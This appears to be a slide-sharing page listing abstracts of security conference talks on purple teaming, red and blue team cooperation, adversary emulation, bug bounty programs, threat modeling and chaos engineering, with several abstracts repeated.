The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
This was part of a 3 hour talk for students at a local college. Introductipn to post exploitation with PowerShell Empire. Feel free to use and learn from.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
Power your way to becoming a red team cyber security expertShivamSharma909
Red Teaming is a tradition of rigorously challenging policies, plans, systems, and assumptions by embracing the adversarial approach. Red teams are independent of the organizations. They are only hired by companies when they decide to check their security policies.
https://infosec-train.blogspot.com/2021/08/power-your-way-to-becoming-red-team.html
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013beltface
1. The document discusses building a purple team program by combining knowledge from blue (security) and red (penetration testing) teams. It provides examples of threat modeling, tabletop exercises, and red team exercises performed for two clients.
2. The results and corrective actions from exercises on Client1 are discussed, such as installing Security Onion and Qualys. Building communication and getting management buy-in is advised to start a purple team program.
3. Resources like the Freenode IRC channels #misec and #ladosanostra are provided for learning attack paths and purple team strategies. Doing regular threat modeling, exercises, and assessments is presented as a proactive approach to security.
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets; Red, Blue, and Purple and the talk will hopefully bring value to anyone working in their respective bucket or assist in their creation/continuing of purple teaming at their company.
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk, we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us. This is an update to our 2016 Brucon talk. We plan to discuss what have we accomplished regarding the above in the last year. We plan to show how we have progressed with the automation of attacker activities and event generation using MITRE’s Cyber Analytics Repository & CAR Exploration Tool (CARET) along with pumping these results to Unfetter (https://iadgov.github.io/unfetter/) for aggregation and display in a useful format.
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
This was part of a 3 hour talk for students at a local college. Introductipn to post exploitation with PowerShell Empire. Feel free to use and learn from.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
Power your way to becoming a red team cyber security expertShivamSharma909
Red Teaming is a tradition of rigorously challenging policies, plans, systems, and assumptions by embracing the adversarial approach. Red teams are independent of the organizations. They are only hired by companies when they decide to check their security policies.
https://infosec-train.blogspot.com/2021/08/power-your-way-to-becoming-red-team.html
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013beltface
1. The document discusses building a purple team program by combining knowledge from blue (security) and red (penetration testing) teams. It provides examples of threat modeling, tabletop exercises, and red team exercises performed for two clients.
2. The results and corrective actions from exercises on Client1 are discussed, such as installing Security Onion and Qualys. Building communication and getting management buy-in is advised to start a purple team program.
3. Resources like the Freenode IRC channels #misec and #ladosanostra are provided for learning attack paths and purple team strategies. Doing regular threat modeling, exercises, and assessments is presented as a proactive approach to security.
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets; Red, Blue, and Purple and the talk will hopefully bring value to anyone working in their respective bucket or assist in their creation/continuing of purple teaming at their company.
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk, we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us. This is an update to our 2016 Brucon talk. We plan to discuss what have we accomplished regarding the above in the last year. We plan to show how we have progressed with the automation of attacker activities and event generation using MITRE’s Cyber Analytics Repository & CAR Exploration Tool (CARET) along with pumping these results to Unfetter (https://iadgov.github.io/unfetter/) for aggregation and display in a useful format.
The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE - ATT&CKcon
Atomic testing involves small, easily executable tests of individual ATT&CK techniques to test security coverage and help defenders learn how adversaries operate. The document recommends scheduling recurring atomic tests, using them to identify gaps, and hold teams and partners accountable. It provides links to the Atomic Red Team project on GitHub and the Atomic Tests website for using, contributing to, and learning more about atomic tests.
5 Tips to Successfully Running a Bug Bounty Programbugcrowd
Learn why bug bounties are great tools in application security, why they can be difficult, and how you can utilize them to start finding more critical vulnerabilities.
This document discusses security bug bounty programs, which offer monetary rewards to researchers who discover qualifying security flaws in companies' systems. It outlines reasons for companies to implement such programs, like finding critical bugs faster and building relationships with the security community. Guidelines are provided on starting a bounty program, like starting small and gradually increasing budgets over time. Lessons from other large companies' bounty programs are shared, such as maintaining changing leaderboards to keep the field interesting.
The document discusses the concept of a "Purple Team" which combines the skills and perspectives of both Red Teams (which simulate attacks) and Blue Teams (which defend against attacks). A Purple Team aims to improve security by facilitating cooperation and feedback between offensive and defensive teams. Several scenarios are provided as examples of how a Purple Team could work to help each side improve. The goal is for teams to stop seeing each other as adversaries and instead work together to enhance the security of an organization.
FRSecure 2018 CISSP Mentor Program Session 10FRSecure
This document summarizes key points from a CISSP mentor program session. It discusses responding to signs of compromise during a penetration test, types of tests that can be done without source code access, and the most efficient penetration test approach. It also covers incident response methodology steps, operational preventative and detective controls like IDS/IPS and SIEM, asset management techniques like configuration hardening and vulnerability management.
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Yan Cui
This document summarizes a talk on applying principles of chaos engineering to serverless applications. It discusses defining steady state, injecting realistic failures like latency and errors, and using controlled experiments to build confidence in a system's ability to withstand failures in production. Specifically for serverless, it addresses challenges like smaller units of deployment and many managed services, and demonstrates how to inject latency and errors at different points to test failure handling. The goal is learning from failures, not intentionally breaking systems, so containment is important.
Resistance Isn't Futile: A Practical Approach to Threat ModelingKatie Nickels
There are hundreds (if not thousands) of adversary groups out there, and it’s understandable if defenders sometimes feel like resistance is futile. Good news: you don’t have to defend against all of them! Even better news: there’s a simple way you can prioritize what adversaries you focus on and how you defend against them–threat modeling. This presentation will present a simple, practical threat modeling approach that any analyst or defender can use to get started figuring out what threats matter to their organization.
The presentation will start by acknowledging the many approaches to threat modeling that others have created, and then discuss why there’s confusion around it. The presentation will then explain four simple steps and practical actions that anyone can take to get started with threat modeling: know your organization, know your adversaries, match those up, and take action. The audience will leave with an understanding of how threat modeling can help any team prioritize what threats they care about and use that to improve their organization’s defenses.
A look at the types malicious artifacts from Advanced and Commodity attacks, what unique artifacts to look for and how logging caught them for a Windows environment and how LOG-MD can help.
MalwareArchaeology.com
LOG-MD.com
More Aim, Less Blame: How to use postmortems to turn failures into something ...Daniel Kanchev
Mistakes and failure are inevitable. Instead of being afraid of them, we should use them as lessons that help identify weak points in our organisations and systems. One way to do this is by writing blameless postmortems. Daniel details exactly how postmortems can help organizations and teams focus on improvement, and how that boosts work morale, makes products better, and strengthens your relationship with customers.
Bug bounty programs have existed since the 1990s but have grown significantly in recent years. The document summarizes highlights from 2014 reports of major companies' bug bounty programs including Google, Facebook, Microsoft, Github, and Tesla. It also discusses reasons for organizations to start bounty programs, tips for reducing noise, and trends in bug bounty research like researcher demographics.
2018 FRSecure CISSP Mentor Program Session 8FRSecure
This document summarizes key points from session #8 of a CISSP mentor program. It includes a quiz with multiple choice questions on firewalls, WAN protocols, wireless security protocols, and Bluetooth security. The session also covered access control models and authentication methods, focusing on passwords as a type 1 authentication method involving something you know. Password hashing, dictionary attacks, and brute force attacks were discussed as methods for cracking passwords.
Secrets and Mysteries of Automated Execution Keynote slidesAlan Richardson
Test Automation, Programming Automation, Automated Execution. This presentations contains some high level models, abstractions and approaches for effective, non-flakey and maintainable automation.
https://www.eviltester.com
Applying principles of chaos engineering to serverless (CodeMesh)Yan Cui
Chaos engineering is a discipline that focuses on improving system resilience through experiments that expose the inherent chaos and failure modes in our system, in a controlled fashion, before these failure modes manifest themselves like a wildfire in production and impact our users.
Netflix is undoubtedly the leader in this field, but much of the publicised tools and articles focus on killing EC2 instances, and the efforts in the serverless community has been largely limited to moving those tools into AWS Lambda functions.
But how can we apply the same principles of chaos to a serverless architecture built around AWS Lambda functions?
These serverless architectures have more inherent chaos and complexity than their serverful counterparts, and, we have less control over their runtime behaviour. In short, there are far more unknown unknowns with these systems.
Can we adapt existing practices to expose the inherent chaos in these systems? What are the limitations and new challenges that we need to consider?
Red Teaming is hot right now. Many people want to get into it just because it sounds cool. While I tend to agree, there are many things to consider. There is way more to red teaming than just "getting in" to organizations. Join us for this one hour webcast where we cover what red team is, why you may want to be a red teamer, and how to become a red teamer.
Purple teaming involves collaborating red and blue teams to improve cybersecurity. By using red team tactics, blue teams can practice detecting and responding to active threats. This helps validate tools and processes, find gaps in detection and response, and ensures organizations are prepared to handle real-world attacks. It differs from traditional penetration testing by focusing more on detection and response rather than just finding vulnerabilities. The goal is to gain confidence in incident response plans through practical exercises.
Using IOCs to Design and Control Threat Activities During a Red Team EngagementJoe Vest
The term Red Team or Red Teaming has become more prevalent in the security industry. Both commercial and government organizations conduct "Red Team Exercises". What does this mean? What is a Red Team engagement? How is it different that other security tests? Isn't current penetration and vulnerability security testing enough?
Red Teaming share many of the fundamentals of other security testing types, yet focuses on specific scenarios and goals that are used to evaluate and measure an organization's overall security defense posture.
Organizations spend a great deal of time and money on the security of their systems. Red Teams have a unique goal of testing an organization's ability to detect, respond to, and recover from an attack. When properly conducted, Red Team activities can significantly contribute to the improvement an organization's security controls, help hone defensive capabilities, and measure the effectiveness of security operations.
This presentation introduces the Red Teaming concept of IOC management, how a Red Team operator can use specific IOCs to blend in to a target, and how to design specific scenarios to test a Blue Team's defensive posture.
This is the slide deck from a presention for SecTor 2016.
I spoke with Chris Gates @carnal0wnage.
The outline is:
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
This talk was presented at BSidesLV 2016. It covered the trend of Automating Penetration Testing. We will delve into what this means for skilled penetration testers / exploit developers and the probable outcome of bigger and more breaches.
The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE - ATT&CKcon
Atomic testing involves small, easily executable tests of individual ATT&CK techniques to test security coverage and help defenders learn how adversaries operate. The document recommends scheduling recurring atomic tests, using them to identify gaps, and hold teams and partners accountable. It provides links to the Atomic Red Team project on GitHub and the Atomic Tests website for using, contributing to, and learning more about atomic tests.
5 Tips to Successfully Running a Bug Bounty Programbugcrowd
Learn why bug bounties are great tools in application security, why they can be difficult, and how you can utilize them to start finding more critical vulnerabilities.
This document discusses security bug bounty programs, which offer monetary rewards to researchers who discover qualifying security flaws in companies' systems. It outlines reasons for companies to implement such programs, like finding critical bugs faster and building relationships with the security community. Guidelines are provided on starting a bounty program, like starting small and gradually increasing budgets over time. Lessons from other large companies' bounty programs are shared, such as maintaining changing leaderboards to keep the field interesting.
The document discusses the concept of a "Purple Team" which combines the skills and perspectives of both Red Teams (which simulate attacks) and Blue Teams (which defend against attacks). A Purple Team aims to improve security by facilitating cooperation and feedback between offensive and defensive teams. Several scenarios are provided as examples of how a Purple Team could work to help each side improve. The goal is for teams to stop seeing each other as adversaries and instead work together to enhance the security of an organization.
FRSecure 2018 CISSP Mentor Program Session 10FRSecure
This document summarizes key points from a CISSP mentor program session. It discusses responding to signs of compromise during a penetration test, types of tests that can be done without source code access, and the most efficient penetration test approach. It also covers incident response methodology steps, operational preventative and detective controls like IDS/IPS and SIEM, asset management techniques like configuration hardening and vulnerability management.
Applying principles of chaos engineering to serverless (O'Reilly Software Arc...Yan Cui
This document summarizes a talk on applying principles of chaos engineering to serverless applications. It discusses defining steady state, injecting realistic failures like latency and errors, and using controlled experiments to build confidence in a system's ability to withstand failures in production. Specifically for serverless, it addresses challenges like smaller units of deployment and many managed services, and demonstrates how to inject latency and errors at different points to test failure handling. The goal is learning from failures, not intentionally breaking systems, so containment is important.
Resistance Isn't Futile: A Practical Approach to Threat ModelingKatie Nickels
There are hundreds (if not thousands) of adversary groups out there, and it’s understandable if defenders sometimes feel like resistance is futile. Good news: you don’t have to defend against all of them! Even better news: there’s a simple way you can prioritize what adversaries you focus on and how you defend against them–threat modeling. This presentation will present a simple, practical threat modeling approach that any analyst or defender can use to get started figuring out what threats matter to their organization.
The presentation will start by acknowledging the many approaches to threat modeling that others have created, and then discuss why there’s confusion around it. The presentation will then explain four simple steps and practical actions that anyone can take to get started with threat modeling: know your organization, know your adversaries, match those up, and take action. The audience will leave with an understanding of how threat modeling can help any team prioritize what threats they care about and use that to improve their organization’s defenses.
A look at the types malicious artifacts from Advanced and Commodity attacks, what unique artifacts to look for and how logging caught them for a Windows environment and how LOG-MD can help.
MalwareArchaeology.com
LOG-MD.com
More Aim, Less Blame: How to use postmortems to turn failures into something ...Daniel Kanchev
Mistakes and failure are inevitable. Instead of being afraid of them, we should use them as lessons that help identify weak points in our organisations and systems. One way to do this is by writing blameless postmortems. Daniel details exactly how postmortems can help organizations and teams focus on improvement, and how that boosts work morale, makes products better, and strengthens your relationship with customers.
Bug bounty programs have existed since the 1990s but have grown significantly in recent years. The document summarizes highlights from 2014 reports of major companies' bug bounty programs including Google, Facebook, Microsoft, Github, and Tesla. It also discusses reasons for organizations to start bounty programs, tips for reducing noise, and trends in bug bounty research like researcher demographics.
2018 FRSecure CISSP Mentor Program Session 8FRSecure
This document summarizes key points from session #8 of a CISSP mentor program. It includes a quiz with multiple choice questions on firewalls, WAN protocols, wireless security protocols, and Bluetooth security. The session also covered access control models and authentication methods, focusing on passwords as a type 1 authentication method involving something you know. Password hashing, dictionary attacks, and brute force attacks were discussed as methods for cracking passwords.
Secrets and Mysteries of Automated Execution Keynote slidesAlan Richardson
Test Automation, Programming Automation, Automated Execution. This presentations contains some high level models, abstractions and approaches for effective, non-flakey and maintainable automation.
https://www.eviltester.com
Applying principles of chaos engineering to serverless (CodeMesh)Yan Cui
Chaos engineering is a discipline that focuses on improving system resilience through experiments that expose the inherent chaos and failure modes in our system, in a controlled fashion, before these failure modes manifest themselves like a wildfire in production and impact our users.
Netflix is undoubtedly the leader in this field, but much of the publicised tools and articles focus on killing EC2 instances, and the efforts in the serverless community has been largely limited to moving those tools into AWS Lambda functions.
But how can we apply the same principles of chaos to a serverless architecture built around AWS Lambda functions?
These serverless architectures have more inherent chaos and complexity than their serverful counterparts, and, we have less control over their runtime behaviour. In short, there are far more unknown unknowns with these systems.
Can we adapt existing practices to expose the inherent chaos in these systems? What are the limitations and new challenges that we need to consider?
Red Teaming is hot right now. Many people want to get into it just because it sounds cool. While I tend to agree, there are many things to consider. There is way more to red teaming than just "getting in" to organizations. Join us for this one hour webcast where we cover what red team is, why you may want to be a red teamer, and how to become a red teamer.
Purple teaming involves collaborating red and blue teams to improve cybersecurity. By using red team tactics, blue teams can practice detecting and responding to active threats. This helps validate tools and processes, find gaps in detection and response, and ensures organizations are prepared to handle real-world attacks. It differs from traditional penetration testing by focusing more on detection and response rather than just finding vulnerabilities. The goal is to gain confidence in incident response plans through practical exercises.
Using IOCs to Design and Control Threat Activities During a Red Team EngagementJoe Vest
The term Red Team or Red Teaming has become more prevalent in the security industry. Both commercial and government organizations conduct "Red Team Exercises". What does this mean? What is a Red Team engagement? How is it different that other security tests? Isn't current penetration and vulnerability security testing enough?
Red Teaming share many of the fundamentals of other security testing types, yet focuses on specific scenarios and goals that are used to evaluate and measure an organization's overall security defense posture.
Organizations spend a great deal of time and money on the security of their systems. Red Teams have a unique goal of testing an organization's ability to detect, respond to, and recover from an attack. When properly conducted, Red Team activities can significantly contribute to the improvement an organization's security controls, help hone defensive capabilities, and measure the effectiveness of security operations.
This presentation introduces the Red Teaming concept of IOC management, how a Red Team operator can use specific IOCs to blend in to a target, and how to design specific scenarios to test a Blue Team's defensive posture.
This is the slide deck from a presention for SecTor 2016.
I spoke with Chris Gates @carnal0wnage.
The outline is:
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
This talk was presented at BSidesLV 2016. It covered the trend of Automating Penetration Testing. We will delve into what this means for skilled penetration testers / exploit developers and the probable outcome of bigger and more breaches.
Average computer users are split into two teams, red and blue, to test their offensive and defensive cybersecurity skills. On the first day, the red team attacks the blue team's network by deploying beacons, exploits, and backdoors while taking down services, while the blue team focuses on understanding and hardening their network. On the second day, the roles are reversed and the blue team goes on the offensive to test the skills they learned from defending against attacks. The event provides benefits to both teams in sharpening their skills through hands-on experience.
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Denim Group
You’ve heard of black, white, and gray box testing? Adding to the security color spectrum, Red Teams (pen testers) working together with Blue Teams (defenders), can improve organizational security and get the most out of security assessments. This talk will discuss both general and specific concepts and techniques to improve penetration tests with coordination of internal security teams. We will discuss high level topics such as knowing what type of assessment is needed for your organization, to more detailed technical concepts such as detecting attack traffic and coordinating with red team attacks. If your internal security team isn't ready for a pentest, lets discuss steps to get your team prepared and ready to fully take advantage of full scope penetration tests. From a pentester perspective, we will discuss the types of testing that is most beneficial to your clients and how to communicate and perform testing activities in conjunction with blue teams. We will also talk about ways to assist the teams with remediation from a 3rd party point of view.
What are the three key points an audience will receive:
· Pen testing techniques on working with internal security
· Internal security techniques for detecting attacks
· Concepts on performing the best type of pen test for your customers
Pentest Apocalypse-That's when you hire a pentester, and they walk all over your network. To avoid this, organizations need to be prepared before the first packet is sent in order to get the most value from the tester. There is no excuse for pentesters to find critical vulnerabilities that are six years old on an assessment. And who needs a zero-day when employees leave credentials on wide-open shares? Just like how Doomsday Preppers helps you prepare for the apocalypse, this presentation will help you prepare for, and avoid, a pentest apocalypse by describing common vulnerabilities found on many assessments. Being prepared for common pentester activities will not only help add value to a pentest but will also help prevent attackers from using the same tactics to compromise your organization.
For More Information Please Visit:- http://bsidestampa.net
http://www.irongeek.com/i.php?page=videos/bsidestampa2015/104-pentest-apocalypse-beau-bullock
Next generation pentest your company cannot buyVlad Styran
This document discusses the differences between penetration testing and vulnerability assessments, and identifies issues with how both clients and consultants typically approach penetration testing. It notes that penetration tests are meant to be deeply interactive and aim to achieve specific goals by exploiting vulnerabilities, while vulnerability assessments only identify issues without attempting exploitation. Both clients and consultants are seen as contributing to unsatisfactory penetration tests when clients lack understanding of the purpose and proper scope of tests, and when consultants perform superficial assessments rather than fully interactive tests. The document provides recommendations for improving penetration testing quality, such as clarifying objectives, evaluating consultant qualifications, and considering alternative payment models.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include E-Mail and password scraping, OWA/EWS brute forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete. Security Consultant at Silent Break Security. Professional Hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in windows environments.
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
Your vulnerability scanner reports that there are no issues on your network. A pentester has spent the last week trying to exploit every system your organization owns with no luck. The check box for this year's compliance audit has been checked. While it is good that these things occurred, they do not complete the picture in regards to true risk.
Real attackers do not solely rely on software exploits to compromise an environment. In almost every breach you hear about the root of the compromise came from a phishing attack. This is why additional tests, post-infection, should be performed to assess just how far an attacker can go after gaining a foothold into your environment.
What command and control channels are available for an attacker to utilize to communicate with your internal systems? How easy is it for an attacker to move laterally within your environment and gain access to other systems? What are your detection capabilities when it comes to sensitive data being exfiltrated out of your environment? How do you test these attacker techniques using open-source tools?
This lecture will address these questions and more, including a showcase of attacker methodologies.
The document discusses building a home arcade system. It details three attempts using different hardware configurations - a Raspberry Pi, Windows laptop with Maximus Arcade emulator, and potentially a Windows PC with Hyperspin frontend. The Raspberry Pi setup had issues with exiting games without a keyboard. The Maximus Arcade setup on a laptop worked better out of the box but had video card issues. The goal is to build an easy-to-use system for kids to play retro games.
Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.
Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear)
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
DevOps toolchains are transforming modern IT, but hackers can undermine their benefits through poorly implemented or vulnerable DevOps tools. Chris Gates and Ken Johnson will share their collaborative attack research into the technology driving DevOps. They will share an attacker's perspective on exploiting DevOps organizations and the countermeasures these organizations should employ.
RSAC 2017
Ken Johnson & Chris Gates
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerJorge Orchilles
Deep Dive into Adversary Emulation - Ransomware Edition
This talk covers the Garmin July 2020 hack by a group called Evil Corp that leveraged a newer ransomware called WastedLocker. We cover Cyber Threat Intelligence, creating an adversary emulation plan for ransomware, demo the emulation, and discuss how to defend against these attacks.
8.8 Las Vegas - Adversary Emulation con C2 MatrixJorge Orchilles
Keynote de 8.8 Las Vegas 2020: https://www.8dot8.org/8-8-las-vegas/
La presentacion es una combinacion de mis presentaciones de Blackhat 2020 Arsenal - C2 Matrix y DEF CON Red Team Village de Adversary Emulation.
https://twitter.com/jorgeorchilles
Adversary Emulation is a type of Red Team Exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective (similar to those of realistic threats or adversaries). Adversary emulations are performed using a structured approach, which can be based on a kill chain or attack flow. Methodologies and Frameworks for Adversary Emulations are covered. Adversary Emulations are end-to-end attacks against a target organization to obtain a holistic view of the organization’s preparedness for a real, sophisticated attack.
Command and Control is one of the most important tactics in the MITRE ATT&CK matrix as it allows the attacker to interact with the target system and realize their objectives. Organizations leverage Cyber Threat Intelligence to understand their threat model and adversaries that have the intent, opportunity, and capability to attack. Red Team, Blue Team, and virtual Purple Teams work together to understand the adversary Tactics, Techniques, and Procedures to perform adversary emulations and improve detective and preventive controls.
The C2 Matrix was created to aggregate all the Command and Control frameworks publicly available (open-source and commercial) in a single resource to assist teams in testing their own controls through adversary emulations (Red Team or Purple Team Exercises). Phase 1 lists all the Command and Control features such as the coding language used, channels (HTTP, TCP, DNS, SMB, etc.), agents, key exchange, and other operational security features and capabilities. This allows more efficient decision making when called upon to emulate and adversary TTPs.
It is the golden age of Command and Control (C2) frameworks. Learn how these C2 frameworks work and start testing against your organization to improve detective and preventive controls.
The C2 Matrix currently has 35 command and control frameworks documented in a Google Sheet, web site, and questionnaire format.
https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
https://www.thec2matrix.com/matrix
https://ask.thec2matrix.com/
Learn how Red Teams and Blue Teams work together in virtual Purple Teams
Leverage Cyber Threat Intelligence to understand adversary tactics, techniques, and procedures
Perform adversary emulations in Red or Purple Team Exercises
Choose which command and control to use for the assessment to provide the most value
Measure and improve people, process, and technology
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
This document discusses 10 tactics that blue teamers and network defenders can use to test their own security posture by thinking like attackers. It recommends using free, open-source tools like Nmap, PowerShell scripts from the PowerSploit and PowerView toolkits to conduct reconnaissance on the network to discover assets, analyze systems for common privilege escalation vectors, find open file shares, map domain trust relationships, audit passwords and account configurations, and test the ability to exfiltrate data past network boundaries. The goal is to help blue teams validate their defenses by demonstrating the same techniques attackers might use with minimal network disruption.
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Mauricio Velazco
Demo 1: https://www.youtube.com/watch?v=cpnrCkj1308
Demo 2: https://www.youtube.com/watch?v=JmtjtiI3-fc
Demo 2 1/2: https://www.youtube.com/watch?v=KRdNbYbJSiI
Demo 3: https://www.youtube.com/watch?v=6gB-upKXTZ4
Automated adversary simulation is often perceived as a hard, dangerous and complicated program to implement and run. Fear no longer, our methodology and tooling will let you test and measure your defenses throughout your production environment to test not only your detection rule’s resilience but the whole event pipeline as well as your team’s response procedures. In this talk, we’ll share with the audience the open source tools we built and the methodology we use that will allow them to hit the ground running at nearly no cost.
WirSindOhana24 - Monitor your Salesforce orgs with open-source only !Nicolas Vuillamy
Panic, the Salesforce production org is down! But it was working perfectly fine yesterday, what happened? What if you had access to a daily monitoring of all your org metadata configuration, to see the detailed differences since yesterday? What if you could install and schedule it in 5 minutes by org? What if it was provided by free and open-source tools? What if it contained additional checks like Apex and Flows quality health, suspiscious user activity, analysis of the consistency between object model and permission sets, detection of deprecated API versions usage, detection of unused flows, and many extra features ? What is the check results could be sent as slack notifications? Let us show you how with a live demo!
This document discusses ethical hacking and provides information on various types of hackers, why people hack, and the hacking process. It defines ethical hacking as legal hacking done with permission to identify vulnerabilities. The hacking process involves preparation, footprinting, enumeration and fingerprinting, vulnerability identification, gaining access, escalating privileges, covering tracks, and creating backdoors. It also discusses how to protect systems and what to do if hacked, such as restoring from backups and patching security holes.
Defending enterprise networks against attackers continues to present a difficult challenge for blue teams. Prevention has fallen short; improving detection & response capabilities has proven to be a step in the right direction. However, without the telemetry produced by adversary behavior, building and testing detection capabilities will be a challenging task.
